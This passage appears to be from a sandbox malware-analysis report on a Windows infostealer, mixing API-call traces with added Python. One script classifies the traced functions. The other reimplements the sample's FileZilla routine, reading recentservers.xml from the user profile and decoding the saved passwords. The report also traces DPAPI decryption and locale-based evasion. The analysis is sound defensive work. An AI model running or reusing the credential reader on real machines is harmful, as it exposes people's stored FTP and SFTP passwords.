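• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
• WideCharToMultiByte.KERNEL32(...), ref: 004072A4
• LocalFree.KERNEL32(...), ref: 004072AE
• Source File: 00000001.00000002.2053079925....sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
APIs
  • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
• GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02D27E48
• LocalAlloc.KERNEL32(00000040,?), ref: 02D27E60
• GetKeyboardLayoutList.USER32(?,00000000), ref: 02D27E74
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D27EC9
• LocalFree.KERNEL32(00000000), ref: 02D27F89
• Source File: 00000001.00000002.2054417626....sdmp, Offset: 02D10000, based on PE: false
• Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
"""

API_RE = re.compile(r"^•\s+([A-Za-z0-9_]+)\.[A-Z0-9]+\b")  # this function's own call
SUB_RE = re.compile(r"^•\s+Part of subcall function [0-9A-F]+:\s+([A-Za-z0-9_]+)\.")
SRC_RE = re.compile(r"Offset:\s*([0-9A-F]+), based on PE:\s*(true|false)")
OPC_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")


def parse_blocks(text):
    """Split the report at each 'APIs' header; one dict per analysed function."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"apis": [], "subcalls": [], "raw": "", "offset": None, "pe": None, "opcode": None}
            blocks.append(cur)
        elif cur is not None:
            cur["raw"] += s + "\n"
            if (m := SUB_RE.match(s)):
                cur["subcalls"].append(m.group(1))  # callee's imports, not this function's
            elif (m := API_RE.match(s)):
                cur["apis"].append(m.group(1))
            elif (m := SRC_RE.search(s)):
                cur["offset"], cur["pe"] = m.group(1), m.group(2) == "true"
            elif (m := OPC_RE.search(s)):
                cur["opcode"] = m.group(1)
    return blocks


RULES = [  # tag, APIs that must all be present, how to read the block
    ("dir_walk", {"FindFirstFileA", "FindNextFileA"}, "directory walk, StrCmpCA on each entry name"),
    ("base64_decode", {"CryptStringToBinaryA"}, "encoded string decoded to bytes"),
    ("dpapi_unprotect", {"CryptUnprotectData"}, "DPAPI blob decrypted, then UTF-16 to ANSI"),
    ("locale_check", {"GetKeyboardLayoutList", "GetLocaleInfoA"}, "keyboard languages enumerated (evasion gate)"),
    ("process_enum", {"CreateToolhelp32Snapshot", "Process32Next"}, "process walk, StrCmpCA on each image name"),
    ("crt_gs_failure", {"IsDebuggerPresent", "UnhandledExceptionFilter", "TerminateProcess"},
     "MSVC __raise_securityfailure for a /GS cookie failure, not an anti-debug check"),
]


def classify(block):
    apis = set(block["apis"])
    tags = [tag for tag, need, _ in RULES if need <= apis]
    # The CRT handler terminates with STATUS_STACK_BUFFER_OVERRUN (C0000409); without that
    # constant in the block the IsDebuggerPresent call deserves to be read as a real check.
    if "crt_gs_failure" in tags and "C0000409" not in block["raw"]:
        tags[tags.index("crt_gs_failure")] = "debugger_check"
    return tags


def shared_opcodes(blocks):
    """Opcode IDs seen at more than one dump offset: the same function in the
    PE-based image dump and in the unpacked, non-PE-based region."""
    seen = defaultdict(set)
    for b in blocks:
        if b["opcode"] and b["offset"]:
            seen[b["opcode"]].add(b["offset"])
    return {op: offs for op, offs in seen.items() if len(offs) > 1}


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    for b in blocks:
        print(b["offset"], b["opcode"][:12], classify(b))
    for op, offs in shared_opcodes(blocks).items():
        print("function", op[:12], "present in dumps at", sorted(offs))
```

The rules key on the function's own call list only; a function whose "Part of subcall" lines mention CryptUnprotectData is a caller of the decryptor, not the decryptor, and should be tagged from its own calls. Run against the full report text, the shared-opcode output is a quick way to pair each unpacked function with its on-disk twin before opening the 02D10000 dump in a disassembler.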
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 02D1E709
                                                                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 02D1E759
                                                                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 02D1E76F
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1EE46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 433455689-0
                                                                                    • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                    • Instruction ID: c9a9a5f0bdca60d0dcb3393a8f98d8d10a81aaf290f611023890ce5c05f4585d
                                                                                    • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                    • Instruction Fuzzy Hash: D512FD71A10228EBCB18FB60DD95EED737AEF64708F4041ADA50A56690EE345F8CCF61
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(00000000,02D153EB,40000001,00000000,00000000,?,02D153EB), ref: 02D29127
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString
                                                                                    • String ID:
                                                                                    • API String ID: 80407269-0
                                                                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction ID: 54039329eb41a252cc530461e34d79a5024912ef9a13bed4c44d09419c35d99c
                                                                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction Fuzzy Hash: 1A113674204218BFDB00CFA5D898FAA33AAAF9A348F108558F9098B350C371EC46DB60
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString
                                                                                    • String ID:
                                                                                    • API String ID: 80407269-0
                                                                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                    • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D56
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,02D15155,00000000,?), ref: 02D19D68
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D91
                                                                                    • LocalFree.KERNEL32(?,?,?,?,02D15155,00000000,?), ref: 02D19DA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 4291131564-0
                                                                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction ID: e23b32bdc703e29b04fb6a98c678dde8e878c32f5c141a80d127e35ddbc4d79c
                                                                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction Fuzzy Hash: 8E11A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208058FD159B390C776A901CB90
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02D19DEB
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 02D19E0A
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02D19E2D
                                                                                    • LocalFree.KERNEL32(?), ref: 02D19E3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3243516280-0
                                                                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction ID: 6744f8c165c85bc40b84f8c67fc5f6ecb335cf8117ebca467cda1e0472bad879
                                                                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction Fuzzy Hash: F811F7B8A00209EFDB04CFA8D985AEEB7B9FF89304F104558E915A7350D730AE10CFA1
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                    • LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3243516280-0
                                                                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                    • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02E39AE8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                                                    • wsprintfA.USER32 ref: 00417AB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 362916592-0
                                                                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0
                                                                                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                    • Instruction ID: e8e32400d2a05627e2e8e272c90ebcdf45a739c1cea46684587a94f117dae0f6
                                                                                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                                                    • Instruction Fuzzy Hash: D971E531451B62DBD7633B31DD01E4A7AA3FF2430AF104924A1DB28730AE226C699F61
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • strtok_s.MSVCRT ref: 0041031B
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                                                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                                                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                                                    • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                                                    • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                                                    • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                                                    • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                                                    • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                                                    • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                                                    • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                                                    • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                                                    • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                                                    • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                                                    • strtok_s.MSVCRT ref: 00410679
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                                                    • memset.MSVCRT ref: 004106DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                    • API String ID: 337689325-514892060
                                                                                    • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                                                    • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
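The string table of the function above (\AppData\Roaming\FileZilla\recentservers.xml, the <Host>, <Port>, <User> and <Pass encoding="base64"> tags, and the "browser: FileZilla", "url:", "login:", "password:", "profile: null" and "NA" labels) shows a FileZilla credential collector. The following Python is an added example written for this report, not code from the sample or from Joe Sandbox: it parses a constructed recentservers.xml and emits a record in the shape those labels suggest, so an analyst can see exactly what a stealer with this routine would obtain from a profile. The record layout and the use of "NA" for a missing user or password are assumptions drawn from the string table, not verified against the binary; the sample scans the file with StrStrA and strtok_s, whereas this uses a real XML parser so malformed input raises instead of yielding garbage.

```python
"""Parse FileZilla's recentservers.xml the way the traced routine does (example code
written for this report; not the sample's code)."""
import base64
import binascii
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample input, modelled on FileZilla's file layout: one entry with a
# base64 password, one with no <Pass> element (key-based logon).
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Logontype>2</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def recentservers_path() -> str:
    """Path the sample builds: <profile>\\AppData\\Roaming\\FileZilla\\recentservers.xml."""
    profile = os.environ.get("USERPROFILE", os.path.expanduser("~"))
    return os.path.join(profile, "AppData", "Roaming", "FileZilla", "recentservers.xml")


def _text(server: ET.Element, tag: str) -> str:
    node = server.find(tag)
    return node.text.strip() if node is not None and node.text else ""


def _decode_pass(server: ET.Element) -> str:
    """Base64-decode <Pass encoding="base64">; 'NA' for absent/undecodable (assumed)."""
    node = server.find("Pass")
    if node is None or not node.text:
        return "NA"
    if node.get("encoding") == "base64":
        try:
            raw = base64.b64decode(node.text.strip(), validate=True)
        except (binascii.Error, ValueError):
            return "NA"
        return raw.decode("utf-8", "replace")
    return node.text.strip()  # older FileZilla builds stored the password in clear


def parse_recentservers(xml_text: str) -> List[Dict[str, str]]:
    """Return one {url, login, password} dict per <Server> that has a host."""
    entries = []
    for server in ET.fromstring(xml_text).iter("Server"):
        host = _text(server, "Host")
        if not host:
            continue
        port = _text(server, "Port")
        entries.append({
            "url": f"{host}:{port}" if port else host,
            "login": _text(server, "User") or "NA",
            "password": _decode_pass(server),
        })
    return entries


def format_records(entries: List[Dict[str, str]]) -> str:
    """Render entries with the labels present in the sample's string table."""
    lines = []
    for e in entries:
        lines += ["browser: FileZilla", "profile: null", f"url: {e['url']}",
                  f"login: {e['login']}", f"password: {e['password']}", ""]
    return "\n".join(lines)


def harvestable_on_this_host() -> List[Dict[str, str]]:
    """What this routine would collect from the current user profile (empty if no file)."""
    path = recentservers_path()
    if not os.path.isfile(path):
        return []
    with open(path, "r", encoding="utf-8") as fh:
        return parse_recentservers(fh.read())


if __name__ == "__main__":
    print(format_records(parse_recentservers(SAMPLE_RECENTSERVERS)))
    print(f"entries exposed on this host: {len(harvestable_on_this_host())}")
```

Running it on an analysis host shows the plaintext that leaves the machine; if harvestable_on_this_host() returns anything on a user's workstation, those FTP/SFTP credentials should be treated as compromised once this sample has executed there.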
                                                                                    APIs
                                                                                    • lstrlen.KERNEL32(00424DA0), ref: 02D14833
                                                                                    • lstrlen.KERNEL32(00424E50), ref: 02D1483E
                                                                                    • lstrlen.KERNEL32(00424F18), ref: 02D14849
                                                                                    • lstrlen.KERNEL32(00424FD0), ref: 02D14854
                                                                                    • lstrlen.KERNEL32(00425078), ref: 02D1485F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D1486E
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D14875
                                                                                    • lstrlen.KERNEL32(00425120), ref: 02D14883
                                                                                    • lstrlen.KERNEL32(004251C8), ref: 02D1488E
                                                                                    • lstrlen.KERNEL32(00425270), ref: 02D14899
                                                                                    • lstrlen.KERNEL32(00425318), ref: 02D148A4
                                                                                    • lstrlen.KERNEL32(004253C0), ref: 02D148AF
                                                                                    • lstrlen.KERNEL32(00425468), ref: 02D148C3
                                                                                    • lstrlen.KERNEL32(00425510), ref: 02D148CE
                                                                                    • lstrlen.KERNEL32(004255B8), ref: 02D148D9
                                                                                    • lstrlen.KERNEL32(00425660), ref: 02D148E4
                                                                                    • lstrlen.KERNEL32(00425708), ref: 02D148EF
                                                                                    • lstrlen.KERNEL32(004257B0), ref: 02D14918
                                                                                    • lstrlen.KERNEL32(00425858), ref: 02D14923
                                                                                    • lstrlen.KERNEL32(00425920), ref: 02D1492E
                                                                                    • lstrlen.KERNEL32(004259C8), ref: 02D14939
                                                                                    • lstrlen.KERNEL32(00425A70), ref: 02D14944
                                                                                    • strlen.MSVCRT ref: 02D14957
                                                                                    • lstrlen.KERNEL32(00425B18), ref: 02D1497F
                                                                                    • lstrlen.KERNEL32(00425BC0), ref: 02D1498A
                                                                                    • lstrlen.KERNEL32(00425C68), ref: 02D14995
                                                                                    • lstrlen.KERNEL32(00425D10), ref: 02D149A0
                                                                                    • lstrlen.KERNEL32(00425DB8), ref: 02D149AB
                                                                                    • lstrlen.KERNEL32(00425E60), ref: 02D149BB
                                                                                    • lstrlen.KERNEL32(00425F08), ref: 02D149C6
                                                                                    • lstrlen.KERNEL32(00425FB0), ref: 02D149D1
                                                                                    • lstrlen.KERNEL32(00426058), ref: 02D149DC
                                                                                    • lstrlen.KERNEL32(00426100), ref: 02D149E7
                                                                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02D14A03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2127927946-0
                                                                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction ID: e5cbec5d31552cd2b53303f7a77f87b25a435778279ab293d26994dde0ef25a0
                                                                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction Fuzzy Hash: 5341CA79740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90295190CBB5D5019B3D
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D29B08
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D29B21
